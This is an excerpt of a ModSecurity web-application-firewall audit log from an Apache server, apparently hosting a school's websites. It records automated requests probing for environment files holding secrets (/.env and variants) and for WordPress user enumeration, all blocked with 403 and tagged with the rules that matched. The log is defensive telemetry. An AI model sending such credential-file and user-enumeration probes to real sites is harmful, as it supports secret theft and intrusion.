Engine-Mode: "ENABLED" --b994557c-Z-- --e0b6fc11-A-- [11/Jun/2025:13:57:20 +0700] aEko0FZ8bXZTkbagOrDZ2gAAAA4 103.236.140.4 45516 103.236.140.4 8181 --e0b6fc11-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 93.118.105.230 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 93.118.105.230 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --e0b6fc11-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e0b6fc11-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749625040095613 2953 (- - -) Stopwatch2: 1749625040095613 2953; combined=1330, p1=446, p2=853, p3=0, p4=0, p5=31, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e0b6fc11-Z-- --f7119a5c-A-- [11/Jun/2025:14:28:10 +0700] aEkwCpKj8lJYHQZ0EnfYMwAAAIM 103.236.140.4 58072 103.236.140.4 8181 --f7119a5c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept-Charset: utf-8 --f7119a5c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7119a5c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749626890256171 847 (- - -) Stopwatch2: 1749626890256171 847; combined=351, p1=310, p2=0, p3=0, p4=0, p5=41, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7119a5c-Z-- --b5283229-A-- [11/Jun/2025:14:53:55 +0700] aEk2E2HSTY1pa5XXpU026wAAAEc 103.236.140.4 58314 103.236.140.4 8181 --b5283229-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.204.55.95 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.204.55.95 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b5283229-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5283229-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749628435834291 3013 (- - -) Stopwatch2: 1749628435834291 3013; combined=1243, p1=415, p2=801, p3=0, p4=0, p5=27, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5283229-Z-- --018f9548-A-- [11/Jun/2025:14:56:22 +0700] aEk2plZ8bXZTkbagOrDclwAAAAU 103.236.140.4 58330 103.236.140.4 8181 --018f9548-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 109.94.119.128 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 109.94.119.128 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --018f9548-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --018f9548-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749628582881155 2974 (- - -) Stopwatch2: 1749628582881155 2974; combined=1271, p1=441, p2=800, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --018f9548-Z-- --07c97072-A-- [11/Jun/2025:15:17:12 +0700] aEk7h1Z8bXZTkbagOrDcpwAAAAs 103.236.140.4 58490 103.236.140.4 8181 --07c97072-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.166.26.208 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.166.26.208 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --07c97072-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07c97072-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749629831998410 3498 (- - -) Stopwatch2: 1749629831998410 3498; combined=1517, p1=525, p2=954, p3=0, p4=0, p5=38, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07c97072-Z-- --eb1b404b-A-- [11/Jun/2025:15:21:45 +0700] aEk8mRdyUEEur5MGa-VSxQAAAMs 103.236.140.4 59864 103.236.140.4 8181 --eb1b404b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 138.219.108.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 138.219.108.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --eb1b404b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --eb1b404b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749630105973236 3356 (- - -) Stopwatch2: 1749630105973236 3356; combined=1448, p1=477, p2=938, p3=0, p4=0, p5=33, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eb1b404b-Z-- --21b0c83b-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIAAAAIk 103.236.140.4 59950 103.236.140.4 8181 --21b0c83b-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --21b0c83b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --21b0c83b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736069294 694 (- - -) Stopwatch2: 1749630736069294 694; combined=255, p1=223, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21b0c83b-Z-- --8a52246d-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIQAAAIg 103.236.140.4 59952 103.236.140.4 8181 --8a52246d-B-- GET /.env.bak HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --8a52246d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8a52246d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736262141 686 (- - -) Stopwatch2: 1749630736262141 686; combined=267, p1=236, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8a52246d-Z-- --7f94a54e-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIgAAAJg 103.236.140.4 59954 103.236.140.4 8181 --7f94a54e-B-- GET /.env.example HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --7f94a54e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f94a54e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736472065 689 (- - -) Stopwatch2: 1749630736472065 689; combined=301, p1=269, p2=0, p3=0, p4=0, p5=31, sr=106, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7f94a54e-Z-- --53e4074a-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZIwAAAIA 103.236.140.4 59956 103.236.140.4 8181 --53e4074a-B-- GET /.env.local HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --53e4074a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53e4074a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736732968 665 (- - -) Stopwatch2: 1749630736732968 665; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53e4074a-Z-- --0364be18-A-- [11/Jun/2025:15:32:16 +0700] aEk_EJKj8lJYHQZ0EnfZJAAAAIs 103.236.140.4 59958 103.236.140.4 8181 --0364be18-B-- GET /.env.old HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --0364be18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0364be18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630736920757 746 (- - -) Stopwatch2: 1749630736920757 746; combined=317, p1=286, p2=0, p3=0, p4=0, p5=31, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0364be18-Z-- --30509002-A-- [11/Jun/2025:15:32:17 +0700] aEk_EZKj8lJYHQZ0EnfZJQAAAIc 103.236.140.4 59960 103.236.140.4 8181 --30509002-B-- GET /.env.production HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --30509002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30509002-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630737099924 676 (- - -) Stopwatch2: 1749630737099924 676; combined=247, p1=215, p2=0, p3=0, p4=0, p5=32, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --30509002-Z-- --856dba18-A-- [11/Jun/2025:15:32:29 +0700] aEk_HZKj8lJYHQZ0EnfZKwAAAJM 103.236.140.4 59976 103.236.140.4 8181 --856dba18-B-- GET /app/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --856dba18-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --856dba18-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630749312496 663 (- - -) Stopwatch2: 1749630749312496 663; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --856dba18-Z-- --53a2244b-A-- [11/Jun/2025:15:32:31 +0700] aEk_H1Z8bXZTkbagOrDdNAAAABI 103.236.140.4 59996 103.236.140.4 8181 --53a2244b-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 185.177.72.144 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 185.177.72.144 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --53a2244b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --53a2244b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749630751572084 699 (- - -) Stopwatch2: 1749630751572084 699; combined=281, p1=249, p2=0, p3=0, p4=0, p5=32, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --53a2244b-Z-- --28771c39-A-- [11/Jun/2025:15:40:37 +0700] aElBBZKj8lJYHQZ0EnfZRAAAAIk 103.236.140.4 60090 103.236.140.4 8181 --28771c39-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.63.243.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.63.243.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --28771c39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --28771c39-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749631237782495 2856 (- - -) Stopwatch2: 1749631237782495 2856; combined=1222, p1=434, p2=760, p3=0, p4=0, p5=28, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --28771c39-Z-- --10c4fc57-A-- [11/Jun/2025:16:06:00 +0700] aElG-JKj8lJYHQZ0EnfZYAAAAIc 103.236.140.4 60334 103.236.140.4 8181 --10c4fc57-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.236.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.236.183 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --10c4fc57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --10c4fc57-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749632760319748 819 (- - -) Stopwatch2: 1749632760319748 819; combined=325, p1=290, p2=0, p3=0, p4=0, p5=35, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10c4fc57-Z-- --3a741654-A-- [11/Jun/2025:16:06:00 +0700] aElG-GHSTY1pa5XXpU03mgAAAEs 103.236.140.4 60338 103.236.140.4 8181 --3a741654-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.154.236.183 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.154.236.183 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --3a741654-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a741654-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749632760725495 21846 (- - -) Stopwatch2: 1749632760725495 21846; combined=42628, p1=217, p2=0, p3=0, p4=0, p5=21219, sr=66, sw=0, l=0, gc=21192 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a741654-Z-- --46a85511-A-- [11/Jun/2025:16:18:15 +0700] aElJ15Kj8lJYHQZ0EnfZbAAAAIs 103.236.140.4 60474 103.236.140.4 8181 --46a85511-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 112.215.192.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 112.215.192.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --46a85511-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46a85511-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749633495554375 3263 (- - -) Stopwatch2: 1749633495554375 3263; combined=1296, p1=440, p2=823, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46a85511-Z-- --f88a3827-A-- [11/Jun/2025:16:19:46 +0700] aElKMpKj8lJYHQZ0EnfZcAAAAIU 103.236.140.4 60492 103.236.140.4 8181 --f88a3827-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 8.1.0; Redmi 5 Plus) AppleWebKit/537.36 (KHTML, like 